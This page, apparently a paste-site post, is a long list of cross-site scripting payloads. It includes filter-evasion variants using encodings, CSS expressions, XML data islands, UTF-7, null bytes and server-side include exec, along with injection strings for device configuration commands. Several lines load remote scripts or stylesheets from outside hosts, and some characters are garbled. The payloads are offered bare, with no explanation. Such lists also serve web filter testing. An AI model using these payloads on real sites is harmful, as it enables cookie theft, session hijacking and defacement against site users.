- >"<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- >"<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- >"<TABLE BACKGROUND="javascript:document.cookie=true;">
- >"<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- >"<DIV STYLE="width: expression(document.cookie=true);">
- >"<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- >"<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- >"<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- >"exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- >"<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- >"<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- >"<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- >"<BASE HREF="javascript:document.cookie=true;//">
- >"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- >"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- >"<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- >"<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- >"<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- >"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- >"<a href="javascript#document.cookie=true;">
- >"<div onmouseover="document.cookie=true;">
- >"<img src="javascript:document.cookie=true;">
- >"<img dynsrc="javascript:document.cookie=true;">
- >"<input type="image" dynsrc="javascript:document.cookie=true;">
- >"<bgsound src="javascript:document.cookie=true;">
- >"&<script>document.cookie=true;</script>
- >"&{document.cookie=true;};
- >"<img src=&{document.cookie=true;};>
- >"<link rel="stylesheet" href="javascript:document.cookie=true;">
- >"<img src="mocha:document.cookie=true;">
- >"<img src="livescript:document.cookie=true;">
- >"<a href="about:<script>document.cookie=true;</script>">
- >"<body onload="document.cookie=true;">
- >"<div style="background-image: url(javascript:document.cookie=true;);">
- >"<div style="behaviour: url([link to code]);">
- >"<div style="binding: url([link to code]);">
- >"<div style="width: expression(document.cookie=true;);">
- >"<style type="text/javascript">document.cookie=true;</style>
- >"<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- >"<style><!--</style><script>document.cookie=true;//--></script>
- >"<<script>document.cookie=true;</script>
- >"<script>document.cookie=true;//--></script>
- >"<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- >"<img src="blah"onmouseover="document.cookie=true;">
- >"<img src="blah>" onmouseover="document.cookie=true;">
- >"<xml src="javascript:document.cookie=true;">
- >"<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- >"<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- -1<meta http-equiv="refresh" content="0;url=javascript:document.cookie=true;">
- -1<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.cookie=true</SCRIPT>">
- -1<SCRIPT>document.cookie=true;</SCRIPT>
- -1<IMG SRC="jav ascript:document.cookie=true;">
- -1<IMG SRC="javascript:document.cookie=true;">
- -1<IMG SRC=" javascript:document.cookie=true;">
- -1<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=document.cookie=true;>
- -1<SCRIPT>document.cookie=true;//<</SCRIPT>
- -1<SCRIPT <B>document.cookie=true;</SCRIPT>
- -1<iframe src="javascript:document.cookie=true;>
- -1<SCRIPT>a=/CrossSiteScripting/\ndocument.cookie=true;</SCRIPT>
- -1</TITLE><SCRIPT>document.cookie=true;</SCRIPT>
- -1<INPUT TYPE="IMAGE" SRC="javascript:document.cookie=true;">
- -1<BODY BACKGROUND="javascript:document.cookie=true;">
- -1<BODY ONLOAD=document.cookie=true;>
- -1<IMG DYNSRC="javascript:document.cookie=true;">
- -1<IMG LOWSRC="javascript:document.coo�ie=true;">
- -1<BGSOUND SRC="javascript:document.cookie=true;">
- -1<BR SIZE="&{document.cookie=true}">
- -1<LAYER SRC="javascript:document.cookie=true;"></LAYER>
- -1<LINK REL="stylesheet" HREF="javascript:document.cookie=true;">
- -1<STYLE>li {list-style-image: url("javascript:document.cookie=true;");</STYLE><UL><LI>CrossSiteScripting
- -1�script�document.cookie=true;�/script�
- -1<IFRAME SRC="javascript:document.cookie=true;"></IFRAME>
- -1<FRAMESET><FRAME SRC="javascript:document.cookie=true;"></FRAMESET>
- -1<TABLE BACKGROUND="javascript:document.cookie=true;">
- -1<TABLE><TD BACKGROUND="javascript:document.cookie=true;">
- -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- -1<DIV STYLE="background-image: url(javascript:document.cookie=true;)">
- -1<DIV STYLE="width: expression(document.cookie=true);">
- -1<STYLE>@im\port'\ja\vasc\ript:document.cookie=true';</STYLE>
- -1<IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(document.cookie=true)">
- -1<CrossSiteScripting STYLE="CrossSiteScripting:expression(document.cookie=true)">
- -1exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*");CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(document.cookie=true)'>
- -1<STYLE TYPE="text/javascript">document.cookie=true;</STYLE>
- -1<STYLE>.CrossSiteScripting{background-image:url("javascript:document.cookie=true");}</STYLE><A CLASS=CrossSiteScripting></A>
- -1<STYLE type="text/css">BODY{background:url("javascript:document.cookie=true")}</STYLE>
- -1<BASE HREF="javascript:document.cookie=true;//">
- -1<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.cookie=true></OBJECT>
- -1<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:document.cookie=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- -1<XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:document.cookie=true"></B></I></XML><SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- -1<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>document.cookie=true</SCRIPT>"></BODY></HTML>
- -1<? echo('<SCR)';echo('IPT>document.cookie=true</SCRIPT>'); ?>
- -1<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.cookie=true;+ADw-/SCRIPT+AD4-
- -1<a href="javascript#document.cookie=true;">
- -1<div onmouseover="document.cookie=true;">
- -1<img src="javascript:document.cookie=true;">
- -1<img dynsrc="javascript:document.cookie=true;">
- -1<input type="image" dynsrc="javascript:document.cookie=true;">
- -1<bgsound src="javascript:document.cookie=true;">
- -1&<script>document.cookie=true;</script>
- -1&{document.cookie=true;};
- -1<img src=&{document.cookie=true;};>
- -1<link rel="stylesheet" href="javascript:document.cookie=true;">
- -1<img src="mocha:document.cookie=true;">
- -1<img src="livescript:document.cookie=true;">
- -1<a href="about:<script>document.cookie=true;</script>">
- -1<body onload="document.cookie=true;">
- -1<div style="background-image: url(javascript:document.cookie=true;);">
- -1<div style="behaviour: url([link to code]);">
- -1<div style="binding: url([link to code]);">
- -1<div style="width: expression(document.cookie=true;);">
- -1<style type="text/javascript">document.cookie=true;</style>
- -1<object classid="clsid:..." codebase="javascript:document.cookie=true;">
- -1<style><!--</style><script>document.cookie=true;//--></script>
- -1<<script>document.cookie=true;</script>
- -1<script>document.cookie=true;//--></script>
- -1<!-- -- --><script>document.cookie=true;</script><!-- -- -->
- -1<img src="blah"onmouseover="document.cookie=true;">
- -1<img src="blah>" onmouseover="document.cookie=true;">
- -1<xml src="javascript:document.cookie=true;">
- -1<xml id="X"><a><b><script>document.cookie=true;</script>;</b></a></xml>
- -1<div datafld="b" dataformatas="html" datasrc="#X"></div> ]]> [\xC0][\xBC]script>document.cookie=true;[\xC0][\xBC]/script>
- >"<iframe src=http://vulnerability-lab.com/>@gmail.com
- >"<script>alert(document.cookie)</script><div style="1@gmail.com
- >"<script>alert(document.cookie)</script>@gmail.com
- <iframe src=http://vulnerability-lab.com/>@gmail.com
- <script>alert(document.cookie)</script><div style="1@gmail.com
- <script>alert(document.cookie)</script>@gmail.com
- +49/>"<iframe src=http://vulnerability-lab.com>1337
- "><iframe src='' onload=alert('mphone')>
- <iframe src=http://vulnerability-lab.com>1337+1
- >�<ScriPt>ALeRt("VlAb")</scriPt>
- >"<IfRaMe sRc=hTtp://vulnerability-lab.com></IfRaMe>
- <html><body><button.onclick="alert(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,34,67,114,111,115,115,83,105,116,101,83,99,114,105,112,116,105,110,103,64,82,69,77,79,86,69,34,41,60,47,115,99,114,105,112,116,62));">String:from.Char.Code</button></body></html>
- ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//\";alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 114, 111, 115, 115, 83, 105, 116, 101, 83, 99, 114, 105, 112, 116, 105, 110, 103))</SCRIPT>
- '';!--"<CrossSiteScripting>=&{()}
- %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%43%72%6F
- %73%73%53%69%74%65%53%63%72%69%70%74%69%6E%67%32%22%29%3C%2F
- %73%63%72%69%70%74%3E
- set vlan name 1337 <script>alert(document.cookie)</script>
- set system name <iframe src=http://www.vulnerability-lab.com>
- set system location "><iframe src=a onload=alert("VL") <
- set system contact <script>alert('VL')</script>
- insert <script>alert(document.cookie)</script>
- add <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
- add user <script>alert(document.cookie)</script> <script>alert(document.cookie)</script>@gmail.com
- add topic <iframe src=http://www.vulnerability-lab.com>
- add name <script>alert('VL')</script>
- perl -e 'print "<IMG SRC=java\0script:alert(\"CrossSiteScripting\")>";' > out
- perl -e 'print "<SCR\0IPT>alert(\"CrossSiteScripting\")</SCR\0IPT>";' > out
- <!--[if gte IE 4]> <SCRIPT>alert('CrossSiteScripting');</SCRIPT> <![endif]-->
- <IMG
- SRC
- =
- "
- j
- a
- v
- s
- c
- r
- i
- p
- t
- :
- l
- e
- (
- '
- V
- L
- A
- B
- )
- >
- <EMBED SRC="http://vulnerability-lab.com/CrossSiteScripting.swf" AllowScriptAccess="always"></EMBED>
- <object type="application/x-shockwave-flash" data="http://www.vulnerability-lab.com/hack.swf" width="300" height="300"><param name="movie" value="http://www.subhohalder.com/xysecteam.swf" /><param name="quality" value="high" /><param name="scale" value="noscale" /><param name="salign" value="LT" /><param name="allowScriptAccess" value="always" /><param name="menu" value="false" /></object>
- <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>
- <<SCRIPT>alert("CrossSiteScripting");//<</SCRIPT>
- <SCRIPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js?<B>
- <SCRIPT SRC=//vulnerability-lab.com/.js>
- <SCRIPT>a=/CrossSiteScripting/ alert(a.source)</SCRIPT>
- <SCRIPT a=">" SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- <SCRIPT a=`>` SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://vulnerability-lab.com/CrossSiteScripting.js"></SCRIPT>
- </TITLE><SCRIPT>alert("CrossSiteScripting");</SCRIPT>
- <IMG SRC="javascript:alert('CrossSiteScripting');">
- <IMG SRC=javascript:alert('CrossSiteScripting')>
- <IMG SRC=JaVaScRiPt:alert('CrossSiteScripting')>
- <IMG SRC=javascript:alert("CrossSiteScripting")>
- <IMG SRC=`javascript:alert("RM'CrossSiteScripting'")`>
- <IMG """><SCRIPT>alert("CrossSiteScripting")</SCRIPT>">
- <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- <IMG SRC="jav ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav	ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav
ascript:alert('CrossSiteScripting');">
- <IMG SRC="jav
ascript:alert('CrossSiteScripting');">
- <IMG SRC=" javascript:alert('CrossSiteScripting');">
- <IMG SRC="javascript:alert('CrossSiteScripting')"
- <IMG DYNSRC="javascript:alert('CrossSiteScripting')">
- <IMG LOWSRC="javascript:alert('CrossSiteScripting')">
- <IMG SRC='vbscript:msgbox("CrossSiteScripting")'>
- <IMG SRC="mocha:[code]">
- <IMG SRC="livescript:[code]">
- <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('CrossSiteScripting');">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('CrossSiteScripting');">
- <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=jAvAsCriPt:aLeRt('CroSsSiteScrIpting');">
- <META HTTP-EQUIV="Link" Content="<http://vulnerability-lab.com/CrossSiteScripting.css>; REL=stylesheet">
- <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('CrossSiteScripting')</SCRIPT>">
- <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('CrossSiteScripting');+ADw-/SCRIPT+AD4-
- <OBJECT TYPE="text/x-scriptlet" DATA="http://vulnerability-lab.com/scriptlet.html"></OBJECT>
- <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('CrossSiteScripting')></OBJECT>
- <STYLE>@im\port'\ja\vasc\ript:alert("CrossSiteScripting")';</STYLE>
- <STYLE>@import'http://vulnerability-lab.com/CrossSiteScripting.css';</STYLE>
- <STYLE TYPE="text/javascript">alert('CrossSiteScripting');</STYLE>
- <STYLE>.CrossSiteScripting{background-image:url("javascript:alert('CrossSiteScripting')");}</STYLE><A CLASS=CrossSiteScripting></A>
- <STYLE type="text/css">BODY{background:url("javascript:alert('CrossSiteScripting')")}</STYLE>
- <STYLE>li {list-style-image: url("javascript:alert('CrossSiteScripting')");}</STYLE><UL><LI>CrossSiteScripting
- <STYLE>BODY{-moz-binding:url("http://vulnerability-lab.com/CrossSiteScriptingmoz.xml#CrossSiteScripting")}</STYLE>
- <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
- <DIV STYLE="background-image: url(javascript:alert('CrossSiteScripting'))">
- <DIV STYLE="width: expression(alert('CrossSiteScripting'));">
- <LAYER SRC="http://vulnerability-lab.com/script.html"></LAYER>
- <LINK REL="stylesheet" HREF="javascript:alert('CrossSiteScripting');">
- <LINK REL="stylesheet" HREF="http://vulnerability-lab.com/CrossSiteScripting.css">
- <BODY BACKGROUND="javascript:alert('CrossSiteScripting')">
- <BODY ONLOAD=alert('CrossSiteScripting')>
- <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("CrossSiteScripting")>
- <iframe src=http://vulnerability-lab.com/index.html <
- <TABLE BACKGROUND="javascript:alert('CrossSiteScripting')">
- <TABLE><TD BACKGROUND="javascript:alert('CrossSiteScripting')">
- <BGSOUND SRC="javascript:alert('CrossSiteScripting');">
- <BR SIZE="&{alert('CrossSiteScripting')}">
- <A HREF="http://server.com/">CrossSiteScripting</A>
- <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">CrossSiteScripting</A>
- <A HREF="http://1113982867/">CrossSiteScripting</A>
- <A HREF="javascript:document.location='http://www.vulnerability-lab.com/'">CrossSiteScripting</A>
- <BASE HREF="javascript:alert('CrossSiteScripting');//">
- \";alert('CrossSiteScripting');//
- <INPUT TYPE="IMAGE" SRC="javascript:alert('CrossSiteScripting');">
- <CrossSiteScripting STYLE="behavior: url(CrossSiteScripting.htc);">
- �script�alert(�CrossSiteScripting�)�/script�
- <IMG STYLE="CrossSiteScripting:expr/*CrossSiteScripting*/ession(alert('CrossSiteScripting'))">
- <CrossSiteScripting STYLE="CrossSiteScripting:expression(alert('CrossSiteScripting'))"> exp/*<A STYLE='no\CrossSiteScripting:noCrossSiteScripting("*//*"); CrossSiteScripting:ex/*CrossSiteScripting*//*/*/pression(alert("CrossSiteScripting"))'>
- a="get";
- b="URL(\"";
- c="javascript:";
- d="alert('CrossSiteScripting');\")";
- eval(v+l+a+b);
- <HTML xmlns:CrossSiteScripting>
- <?import namespace="CrossSiteScripting" implementation="http://ha.ckers.org/CrossSiteScripting.htc">
- <CrossSiteScripting:CrossSiteScripting>CrossSiteScripting</CrossSiteScripting:CrossSiteScripting>
- <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('CrossSiteScripting');">]]>
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <XML ID="CrossSiteScripting"><I><B><IMG SRC="javas<!-- -->cript:alert('CrossSiteScripting')"></B></I></XML>
- <SPAN DATASRC="#CrossSiteScripting" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
- <XML SRC="CrossSiteScriptingtest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- <HTML><BODY>
- <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
- <?import namespace="t" implementation="#default#time2">
- <t:set attributeName="innerHTML" to="CrossSiteScripting<SCRIPT DEFER>alert("CrossSiteScripting")</SCRIPT>">
- </BODY></HTML>
- <SCRIPT SRC="http://vulnerability-lab.com/CrossSiteScripting.jpg"></SCRIPT>
- <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://vulnerability-lab.com/CrossSiteScripting.js></SCRIPT>'"-->
- <? echo('<SCR)';
- echo('IPT>alert("CrossSiteScripting")</SCRIPT>'); ?>
- <IMG SRC="http://www.vulnerability-lab.com/file.php?variables=malicious">
- Redirect 302 /vlab.jpg http://vulnerability-lab.com/admin.asp&deleteuser
- %3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%74%65%73%74%2E%64%65%3E
- <iframe src=http:/b#x2F;test.de>
- <iframe src=http://test.de>
- PGlmcmFtZSBzcmM9aHR0cDovL3Rlc3QuZGU+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement